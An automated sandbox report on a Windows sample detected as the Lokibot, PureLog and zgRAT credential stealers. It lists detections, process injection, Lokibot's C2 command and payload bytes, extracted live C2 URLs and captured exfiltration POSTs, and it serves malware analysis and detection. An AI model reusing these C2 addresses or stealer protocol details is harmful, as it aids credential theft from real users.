Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6SQADa3zKv.exe

Overview

General Information

Sample name:6SQADa3zKv.exe
renamed because original name is a hash value
Original sample name:7cfbe6d3f41c153c78f4e24211ffd891cde46411f072d83798e0e03e140a7021.exe
Analysis ID:1569270
MD5:d1d899b06642500d72acaeb42896b348
SHA1:69683cca8c559a7cc2b6484ea982b2ca44be7a2f
SHA256:7cfbe6d3f41c153c78f4e24211ffd891cde46411f072d83798e0e03e140a7021
Tags:exeuser-adrian__luca
Infos:

Detection

Lokibot, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 6SQADa3zKv.exe (PID: 5948 cmdline: "C:\Users\user\Desktop\6SQADa3zKv.exe" MD5: D1D899B06642500D72ACAEB42896B348)
    • aspnet_compiler.exe (PID: 1292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • aspnet_compiler.exe (PID: 5748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
6SQADa3zKv.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    6SQADa3zKv.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      6SQADa3zKv.exeMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0xe7dd:$s1: file:///
      • 0xe739:$s2: {11111-22222-10009-11112}
      • 0xe76d:$s3: {11111-22222-50001-00000}
      • 0xd6e4:$s4: get_Module
      • 0xe36a:$s5: Reverse
      • 0xe359:$s6: BlockCopy
      • 0xe3a2:$s7: ReadByte
      • 0xe7f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000000.2119213083.0000000000412000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x17ef8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                Click to see the 22 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.6SQADa3zKv.exe.410000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  0.0.6SQADa3zKv.exe.410000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.0.6SQADa3zKv.exe.410000.0.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                    • 0xe7dd:$s1: file:///
                    • 0xe739:$s2: {11111-22222-10009-11112}
                    • 0xe76d:$s3: {11111-22222-50001-00000}
                    • 0xd6e4:$s4: get_Module
                    • 0xe36a:$s5: Reverse
                    • 0xe359:$s6: BlockCopy
                    • 0xe3a2:$s7: ReadByte
                    • 0xe7f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                    0.2.6SQADa3zKv.exe.384ab08.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                      0.2.6SQADa3zKv.exe.384ab08.3.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                      • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                      Click to see the 27 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: AspNetCompiler Execution
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\6SQADa3zKv.exe", ParentImage: C:\Users\user\Desktop\6SQADa3zKv.exe, ParentProcessId: 5948, ParentProcessName: 6SQADa3zKv.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 1292, ProcessName: aspnet_compiler.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-05T17:08:49.559564+010020243121A Network Trojan was detected192.168.2.649707172.67.153.6380TCP
                      2024-12-05T17:08:50.948383+010020243121A Network Trojan was detected192.168.2.649708172.67.153.6380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-05T17:08:48.612484+010020253811Malware Command and Control Activity Detected192.168.2.649707172.67.153.6380TCP
                      2024-12-05T17:08:49.951076+010020253811Malware Command and Control Activity Detected192.168.2.649708172.67.153.6380TCP
                      2024-12-05T17:08:51.642512+010020253811Malware Command and Control Activity Detected192.168.2.649710172.67.153.6380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-05T17:08:52.636477+010020243131Malware Command and Control Activity Detected192.168.2.649710172.67.153.6380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-05T17:08:52.636477+010020243181Malware Command and Control Activity Detected192.168.2.649710172.67.153.6380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-05T17:08:48.612484+010020216411A Network Trojan was detected192.168.2.649707172.67.153.6380TCP
                      2024-12-05T17:08:49.951076+010020216411A Network Trojan was detected192.168.2.649708172.67.153.6380TCP
                      2024-12-05T17:08:51.642512+010020216411A Network Trojan was detected192.168.2.649710172.67.153.6380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-05T17:08:48.612484+010028257661Malware Command and Control Activity Detected192.168.2.649707172.67.153.6380TCP
                      2024-12-05T17:08:49.951076+010028257661Malware Command and Control Activity Detected192.168.2.649708172.67.153.6380TCP
                      2024-12-05T17:08:51.642512+010028257661Malware Command and Control Activity Detected192.168.2.649710172.67.153.6380TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 6SQADa3zKv.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: https://dddotx.shop/Mine/PWS/fre.phpAvira URL Cloud: Label: malware
                      Source: http://kbfvzoboss.bid/alien/fre.phpAvira URL Cloud: Label: phishing
                      Source: http://alphastand.top/alien/fre.phpAvira URL Cloud: Label: malware
                      Source: https://dddotx.shop/Mine/PWS/fre.phpHAvira URL Cloud: Label: malware
                      Source: http://alphastand.win/alien/fre.phpAvira URL Cloud: Label: malware
                      Source: http://dddotx.shop/Mine/PWS/fre.phpAvira URL Cloud: Label: malware
                      Source: http://alphastand.trade/alien/fre.phpAvira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}
                      Multi AV Scanner detection for submitted file
                      Source: 6SQADa3zKv.exeReversingLabs: Detection: 60%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: 6SQADa3zKv.exeJoe Sandbox ML: detected
                      Source: 6SQADa3zKv.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: 6SQADa3zKv.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: BATMAN.pdbxD source: 6SQADa3zKv.exe, 00000000.00000002.2123697598.0000000002760000.00000004.08000000.00040000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123823559.00000000027E1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2182297243.0000000000942000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: BATMAN.pdb source: 6SQADa3zKv.exe, 00000000.00000002.2123697598.0000000002760000.00000004.08000000.00040000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123823559.00000000027E1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Oct21.pdb source: 6SQADa3zKv.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49708 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49708 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49708 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49710 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49710 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49710 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49707 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49707 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49707 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49707 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49708 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49710 -> 172.67.153.63:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49710 -> 172.67.153.63:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                      Source: Malware configuration extractorURLs: https://dddotx.shop/Mine/PWS/fre.php
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 188Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 188Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 161Connection: close
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
                      Source: global trafficDNS traffic detected: DNS query: dddotx.shop
                      Source: unknownHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 188Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 05 Dec 2024 16:08:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DC1Le%2BDiy2G%2FblVMQtNZTQZxkNLrvBkMzyrk8Lv0Hsn3oMUxWrZ4Fcu%2BnDXcVeRiDamqR%2F4%2FmiIDaL4ITK2m3nzrzAmdcLxkAJgDMm4sqsdbTQZLSnmy5ZYx6tKXtw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ed54c0cac7c42de-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><tit
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 05 Dec 2024 16:08:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E8KByjwPVRDzckWfwhsqzcyp8CStwlgUPhMUsP1S3SlyviMFU9tQIcsNRTL%2FS4L9%2B0ejmFMtsEWeuY%2BX3iLhq4qrQOQt3A0bgWRp8JG%2FK3lSw2oLkl5O%2B4VJ%2F6saMw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ed54c15486c19bf-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>S
